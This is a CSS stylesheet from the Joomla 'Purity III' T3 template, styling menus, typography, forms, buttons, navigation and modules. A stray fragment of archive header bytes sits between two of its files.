.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-left: -20px;
  margin-right: -20px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-left: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #0077bb;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}PKӜ�\�����X�Xpurity_iii/css/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: left;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #0077bb;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #00466e;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: left;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #0077bb;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: left;
}
.text-right {
  text-align: right;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-left: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-left: 0;
  list-style: none;
}
.list-inline {
  padding-left: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-left: 5px;
  padding-right: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-left: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: left;
    width: 160px;
    clear: left;
    text-align: right;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-left: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    display: table;
    content: " ";
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-left: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-right: 15px;
  padding-left: 0;
  border-right: 5px solid #eeeeee;
  border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: right;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:focus,
.btn-inverse.focus {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #000000;
}
.btn-inverse:hover {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  background-image: none;
  border-color: #191919;
}
.btn-inverse:active:hover,
.btn-inverse.active:hover,
.open > .dropdown-toggle.btn-inverse:hover,
.btn-inverse:active:focus,
.btn-inverse.active:focus,
.open > .dropdown-toggle.btn-inverse:focus,
.btn-inverse:active.focus,
.btn-inverse.active.focus,
.open > .dropdown-toggle.btn-inverse.focus {
  color: #ffffff;
  background-color: #191919;
  border-color: #000000;
}
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-left: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-left: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-left-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-left-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #0077bb;
  border-bottom-color: #0077bb;
}
.nav a:hover .caret {
  border-top-color: #00466e;
  border-bottom-color: #00466e;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-left: 0;
  padding-right: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  display: table;
  content: " ";
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: left;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
}
@media screen and (min-width: 768px) {
  .counter {
    float: right;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  right: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #0077bb;
  border-color: #0067a2;
}
.navbar-default .navbar-text {
  color: #bbe6ff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-left: 30px;
  }
}
.navbar-default .navbar-nav > li > a,
.navbar-default .navbar-nav > li > span {
  color: #bbe6ff;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a,
  .navbar-default .navbar-nav > li > span {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > span:hover,
.navbar-default .navbar-nav > li > a:focus,
.navbar-default .navbar-nav > li > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > span:hover,
  .navbar-default .navbar-nav > li > a:focus,
  .navbar-default .navbar-nav > li > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > span,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > span:hover,
.navbar-default .navbar-nav > .active > a:focus,
.navbar-default .navbar-nav > .active > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > span,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > span:hover,
  .navbar-default .navbar-nav > .active > a:focus,
  .navbar-default .navbar-nav > .active > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #0067a2;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #bbe6ff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #0067a2;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #bbe6ff;
  border-bottom-color: #bbe6ff;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #0067a2;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #005788;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #bbe6ff;
    padding: 20px 20px 20px 30px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #005788;
    border-top: 1px solid #00466e;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #00466e;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-left: 40px;
  }
}
.navbar-default .navbar-link {
  color: #bbe6ff;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #0067a2;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-left: 0;
  padding-right: 0;
  float: left;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -20px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-right: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #0067a2;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  left: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  right: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  display: table;
  content: " ";
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-left: 20px;
  padding-left: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-left: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-left: 0;
  margin-left: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #0067a2;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    left: auto;
    right: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form .input-group-addon {
  align-items: center;
  display: flex;
  width: auto;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
#login-form button[class*=plg_system_webauthn_login_button] {
  align-items: center;
  color: #000;
  display: flex;
  max-height: unset;
  gap: 4px;
  width: 100%;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: right;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-right: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-left: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0;
}
.module-ct .whosonline {
  margin-left: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 5px 5px 0;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: left;
  margin: 0 5px 5px 0;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
